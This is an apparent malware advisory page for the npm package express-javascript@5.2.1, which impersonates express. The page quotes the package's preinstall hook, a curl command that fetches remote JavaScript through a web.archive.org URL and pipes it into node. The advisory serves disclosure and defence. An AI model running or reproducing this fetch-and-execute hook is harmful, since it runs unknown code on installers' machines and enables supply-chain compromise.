Logo
npm

express-javascript@5.2.1

Vulnerability report · Last retrieved from osv.dev September 29, 2026 at 3:09 PM UTC

Malicious

OSV ID

MAL-2026-17242

Ecosystem

npm

Summary

express-javascript@5.2.1 impersonates the express package (copying its description, author, contributors, repository, homepage, and dependency list verbatim) while its package.json preinstall lifecycle hook runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from a third-party account unrelated to the express publisher via a web.archive.org wrapper on a mutable branch/main ref and piping it into node with no integrity check. Every npm install of this package executes whatever bytes that endpoint returns on the installer's machine.

Source: amazon-inspector (73e4909976d37fb7fb7dd30012d82bd882608df20716a824f1dc0efa074b5401)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.